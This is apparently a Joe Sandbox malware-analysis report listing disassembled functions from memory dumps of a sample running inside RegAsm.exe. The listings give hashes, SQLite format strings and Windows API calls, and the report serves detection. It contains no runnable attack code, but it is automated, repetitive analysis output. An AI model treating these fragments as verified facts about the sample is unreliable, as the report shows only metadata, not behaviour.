String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: de671d89289ab3a7ae1f81da42d5ef82058d928a442dcf2aa593d55e59c18ca8
Instruction ID: f0adaffccee0cfe856fd2caef72281042db6deabbe02c348f5e6791379968820
Opcode Fuzzy Hash: de671d89289ab3a7ae1f81da42d5ef82058d928a442dcf2aa593d55e59c18ca8
Instruction Fuzzy Hash: 36115777A0021067CF105B49FC41DDBBFA5DFC52B6F0D8569FA4857222D322E92197A2

Function 1B41FD60 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B41FDE6, 1B41FE61
%s at line %d of [%.10s], xrefs: 1B41FE82
database corruption, xrefs: 1B41FE7D

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: d519c6383fd475f9020515e630136025a08417a5503e1c7a16e5f48a119eaa3a
Instruction ID: 4dbb1247e67cf292160d6a4cd7a3ad9bccc5319e4f63ba08930d0bf611ec356a
Opcode Fuzzy Hash: d519c6383fd475f9020515e630136025a08417a5503e1c7a16e5f48a119eaa3a
Instruction Fuzzy Hash: 3D310B789142818AD3249F24C4143E2BA61BF15389F68C5CDE4498F753E37BD8C3D7A6

Function 1B42D6F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

Strings

%s%s, xrefs: 1B42D725

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s%s
API String ID: 0-3252725368
Opcode ID: 785c25b267b92612006061d03c0ebbf973af883814a69c3b6e2eb5b0fe1207fe
Instruction ID: 1a769f8a471edbf88fb29891c0d39f4a34b7446e2458f7fa203e8643c7910b5b
Opcode Fuzzy Hash: 785c25b267b92612006061d03c0ebbf973af883814a69c3b6e2eb5b0fe1207fe
Instruction Fuzzy Hash: 3611B4BA9002609BDB019F15ECC8B9633BCFFD025AF84416AF9C8C6200D739D558C7A2

Function 1B481F70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

JSON path error near '%q', xrefs: 1B481F92

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: JSON path error near '%q'
API String ID: 0-481711382
Opcode ID: a6f5aa1b819870e56e3e4995c70fd54e143ae7672445c40c9324fdf1593c8a79
Instruction ID: d8a6379f8851a17dd93ee0b3f819b127ca34fa16ff61435ca0490868cba4bfdb
Opcode Fuzzy Hash: a6f5aa1b819870e56e3e4995c70fd54e143ae7672445c40c9324fdf1593c8a79
Instruction Fuzzy Hash: 030104726092116EEB149B948C01BDB7BC5DF45331F20462DF995963D0DB71AC1197A2

Function 1B3E1DF0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B3E1E53
%s at line %d of [%.10s], xrefs: 1B3E1E63
misuse, xrefs: 1B3E1E59

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: 4f52b9717757c4864d8da02cf3c7bb69407684c2cbe078ca02a775f24d604b32
Instruction ID: 68f2c2ecb58811ce982c1604de35602c745c59f55353f477ae17560c0db1201c
Opcode Fuzzy Hash: 4f52b9717757c4864d8da02cf3c7bb69407684c2cbe078ca02a775f24d604b32
Instruction Fuzzy Hash: EA119174608AA09BD714DE2ED848AD6BBACAF95A05F08055EF0458B322D324E965C7B2

Function 1B3FF0E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

INSERT INTO %Q.%Q(%Q) VALUES('flush'), xrefs: 1B3FF105

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: INSERT INTO %Q.%Q(%Q) VALUES('flush')
API String ID: 0-2312637080
Opcode ID: 95b0c1f3dd10600c14d5696262f0281b1c45f42f1d5c03b45dbc1503f3ae17be
Instruction ID: 133119403b124e5a3ca803fc0ab678af2bc4a812fef1fab0075fbcb52df78a79
Opcode Fuzzy Hash: 95b0c1f3dd10600c14d5696262f0281b1c45f42f1d5c03b45dbc1503f3ae17be
Instruction Fuzzy Hash: 02019E366046415ED721966EFC40FE7B7D8EBC4621F09056EF9ADC2201D361A89592A1

Function 1B3DEF30 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B3DEFA6
%s at line %d of [%.10s], xrefs: 1B3DEFB5
misuse, xrefs: 1B3DEFB0

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: f5cb6ee66c47c46d54924680a7cbff6abbcc928069a6f008ad0b0b243ed99814
Instruction ID: ea966fce15837bd2d582204e916053164fcd3987a520dc22fb80e8732d8f8dff
Opcode Fuzzy Hash: f5cb6ee66c47c46d54924680a7cbff6abbcc928069a6f008ad0b0b243ed99814
Instruction Fuzzy Hash: 3401D2B29057319BD705CF08DC84B8A7BA9ABE5709F8A411DE4445B340C331E859C7A2

Function 1B449180 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

Strings

%s_stat, xrefs: 1B449192

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s_stat
API String ID: 0-920702477
Opcode ID: e22562cf2803fe16910509107e96dc5b1d746da3e9f1812c873618c4be66360f
Instruction ID: 6a9efbe9cfb6a478228dc9156f6bcb3cb48ea5a88a66021a6dc0767c643ba1a7
Opcode Fuzzy Hash: e22562cf2803fe16910509107e96dc5b1d746da3e9f1812c873618c4be66360f
Instruction Fuzzy Hash: 2DF02763A043523FFB008679FC81BCAEBD9AF44160F5C8625E44C92104C322BCB153A1

Function 1B3F7F70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN), xrefs: 1B3F7F76

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN)
API String ID: 0-3072645960
Opcode ID: 1d1294414dd170952e5374fc05f76be606d472c947ae94de5f9db3d925d540e0
Instruction ID: bc50d757e8ad5d9ee4735998f2f607c475c2282a9c69f8204cfb74acd8440cfd
Opcode Fuzzy Hash: 1d1294414dd170952e5374fc05f76be606d472c947ae94de5f9db3d925d540e0
Instruction Fuzzy Hash: 8EF0F03BA0434286EB115F19FC02BC9B790AFC1321F55026DF844DA280E760A8A583A2

Function 00411955 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,00411D53,00000000,?,00000000,?), ref: 00411960
HeapAlloc.KERNEL32(00000000,?,00411D53,00000000,?,00000000,?), ref: 00411967
wsprintfW.USER32 ref: 00411978

Strings

%hs, xrefs: 00411972

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesswsprintf
String ID: %hs
API String ID: 659108358-2783943728
Opcode ID: 9462db3f9c7b7f42e378e3539785a70f2af74d1bc09bca226d5d8d5221b8cc10
Instruction ID: 15c0dc1b2a7680b0e242f8f987b609a600f096c7e264afa3152c38c708baf2e4
Opcode Fuzzy Hash: 9462db3f9c7b7f42e378e3539785a70f2af74d1bc09bca226d5d8d5221b8cc10
Instruction Fuzzy Hash: A5D05E3174022477C6206BA4AC09F657A28EB097A3F400030FB0A85150CD698A1147EA

Function 1B4D6B50 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 9COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4D6B50
%s at line %d of [%.10s], xrefs: 1B4D6B5E
cannot open file, xrefs: 1B4D6B59

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$cannot open file$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-1799306995
Opcode ID: 2176299025a52957140e8db5dc5d449063ece8f91b5e241af2cc2db2e39c65f1
Instruction ID: 7bb4c6910d7d34191fbb5bb2706e520010db9a000911dca21bc5d886fd2391ca
Opcode Fuzzy Hash: 2176299025a52957140e8db5dc5d449063ece8f91b5e241af2cc2db2e39c65f1
Instruction Fuzzy Hash: 54B0925A90028036FA00BF54CC2AFC6EC20675860AFCD889CB14A393A6E096C8A08232

Function 1B3F7DA0 Relevance: 6.2, APIs: 4, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdc5a37cde5c611446418141195c56450245ac69ed4a3600e34569906c98d222
Instruction ID: b072499a0488299704d0f266107a4230a33f47df2ecefb1bb8bda09eada1b3d9
Opcode Fuzzy Hash: bdc5a37cde5c611446418141195c56450245ac69ed4a3600e34569906c98d222
Instruction Fuzzy Hash: BB41DC36A007019FD305CF18D980A92F7E1FB84324F54866EE98687A62D772FC61CB92

Function 1B3FCAE0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1f72e056978e0c56b3a648016d01522b55b73f3f3de6405ca11ef4ec380df78
Instruction ID: 98d55d02970b658c6e12330c3ff210745b933dcda3975f1e048c54ba2380a915
Opcode Fuzzy Hash: d1f72e056978e0c56b3a648016d01522b55b73f3f3de6405ca11ef4ec380df78
Instruction Fuzzy Hash: 5E3193BAA047019BEB10CF68E840B96B3E4FF84351F440A7EE545C7650E725EDA4D7A2

Function 1B3FB1F0 Relevance: 6.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c84fadece956eb82bcd06ee462d33b28814fba88082786c6e23e5494ba88420
Instruction ID: d46efecadc3da70c92de6e385526dc00bacc870a0919c00c96852cad563d6400
Opcode Fuzzy Hash: 2c84fadece956eb82bcd06ee462d33b28814fba88082786c6e23e5494ba88420
Instruction Fuzzy Hash: FB31A6B5504B41AFD728CB15E8406DBB7E4FF55314F048A2DD4DAC6900E331F8AAC752

Function 004128CE Relevance: 6.1, APIs: 4, Instructions: 92stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004128D3
strtok_s.MSVCRT ref: 004128FA
StrCmpCA.SHLWAPI(00000000,004276FC,?,?,?,?,004181C7), ref: 0041292B
strtok_s.MSVCRT ref: 0041298C

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strtok_s$H_prolog
String ID:
API String ID: 1158113254-0
Opcode ID: 0a3dad01a76fab2bee2c0da44b74e9764149df0b5dc479d2e8738c086d196200
Instruction ID: d1d6ad4fa4d4d7c82990e20f7d35f5a0559aa076344074940364d62ebaceb836
Opcode Fuzzy Hash: 0a3dad01a76fab2bee2c0da44b74e9764149df0b5dc479d2e8738c086d196200
Instruction Fuzzy Hash: 3D21A4B17105069FCB18DF68CAC1EFBB3ACEB14314F10412FE016D6591DBB8EA828A58

Function 00412753 Relevance: 6.1, APIs: 4, Instructions: 78stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00412758
strtok_s.MSVCRT ref: 0041277F
StrCmpCA.SHLWAPI(00000000,004276F0,00000001,?,?,?,004180DF), ref: 004127BB

Part of subcall function 00410640: lstrlenA.KERNEL32(?,00000000,?,00417C9B,0042771F,0042771E,00000000,00000000,?,0041867E), ref: 00410649
Part of subcall function 00410640: lstrcpy.KERNEL32(00000000,00000000), ref: 0041067D

strtok_s.MSVCRT ref: 004127F7

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
